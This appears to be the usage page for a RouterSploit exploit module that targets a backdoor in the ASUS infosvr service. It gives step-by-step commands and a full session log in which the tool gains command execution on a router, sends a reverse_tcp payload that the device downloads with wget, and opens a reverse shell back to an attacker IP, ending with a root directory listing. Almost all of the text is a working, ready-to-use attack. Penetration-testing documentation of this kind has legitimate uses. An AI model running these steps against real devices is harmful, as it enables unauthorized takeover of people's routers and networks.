Description
Module exploits remote command execution in multiple ASUS devices. If the target is vulnerable, command loop is invoked that allows executing commands on operating system level.
Verification Steps
- Start
./rsf.py - Do:
use exploits/routers/asus/infosvr_backdoor_rce - Do: `set target[TargetIP]
- Do:
run - If router is vulnerable, it should be possible to execute commands on operating system level.
- Do:
set payload reverse_tcp - Do:
set lhost [AttackerIP] - Do:
run - Payload is sent to device and executed providing attacker with the command shell.
Scenarios
rsf > use exploits/routers/asus/infosvr_backdoor_rce
rsf (Asus Infosvr Backdoor RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asus Infosvr Backdoor RCE) > run
[*] Running module...
[+] Target is vulnerable
[*] Invoking command loop...
[*] Please note that only first 256 characters of the output will be displayed or use reverse_tcp
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
cmd > show payloads
[*] Available payloads:
Payload Name Description
------- ---- -----------
bind_tcp ARMLE Bind TCP Creates interactive tcp bind shell for ARMLE architecture.
reverse_tcp ARMLE Reverse TCP Creates interactive tcp reverse shell for ARMLE architecture.
cmd > set payload reverse_tcp
cmd (ARMLE Reverse TCP) > show options
Payload Options:
Name Current settings Description
---- ---------------- -----------
lhost Connect-back IP address
lport 5555 Connect-back TCP Port
encoder Encoder
cmd (ARMLE Reverse TCP) > set lhost 192.168.1.115
lhost => 192.168.1.115
cmd (ARMLE Reverse TCP) > run
[*] Using wget method
[*] Using wget to download binary
[*] Executing payload on the device
[*] Waiting for reverse shell...
[*] Connection from 192.168.1.1:35220
[+] Enjoy your shell
ls -la
ls -la
drwxr-xr-x 18 admin root 325 Mar 15 2017 .
drwxr-xr-x 18 admin root 325 Mar 15 2017 ..
drwxr-xr-x 2 admin root 3 Mar 15 2017 asus_jffs
drwxr-xr-x 2 admin root 706 Mar 15 2017 bin
drwxr-xr-x 2 admin root 3 Mar 15 2017 cifs1
drwxr-xr-x 2 admin root 3 Mar 15 2017 cifs2
drwxr-xr-x 5 admin root 1540 Sep 4 23:04 dev
lrwxrwxrwx 1 admin root 7 Mar 15 2017 etc -> tmp/etc
lrwxrwxrwx 1 admin root 8 Mar 15 2017 home -> tmp/home
drwxr-xr-x 5 admin root 0 Sep 4 23:25 jffs
drwxr-xr-x 3 admin root 402 Mar 15 2017 lib
lrwxrwxrwx 1 admin root 9 Mar 15 2017 media -> tmp/media
drwxr-xr-x 2 admin root 3 Mar 15 2017 mmc
lrwxrwxrwx 1 admin root 7 Mar 15 2017 mnt -> tmp/mnt
lrwxrwxrwx 1 admin root 7 Mar 15 2017 opt -> tmp/opt
dr-xr-xr-x 101 admin root 0 Jan 1 1970 proc
drwxr-xr-x 7 admin root 766 Mar 15 2017 rom
lrwxrwxrwx 1 admin root 13 Mar 15 2017 root -> tmp/home/root
drwxr-xr-x 2 admin root 2428 Mar 15 2017 sbin
drwxr-xr-x 11 admin root 0 Jan 1 1970 sys
drwxr-xr-x 2 admin root 3 Mar 15 2017 sysroot
drwxrwxrwx 13 admin root 860 Sep 4 23:33 tmp
drwxr-xr-x 8 admin root 139 Mar 15 2017 usr
lrwxrwxrwx 1 admin root 7 Mar 15 2017 var -> tmp/var
drwxr-xr-x 14 admin root 6036 Mar 15 2017 www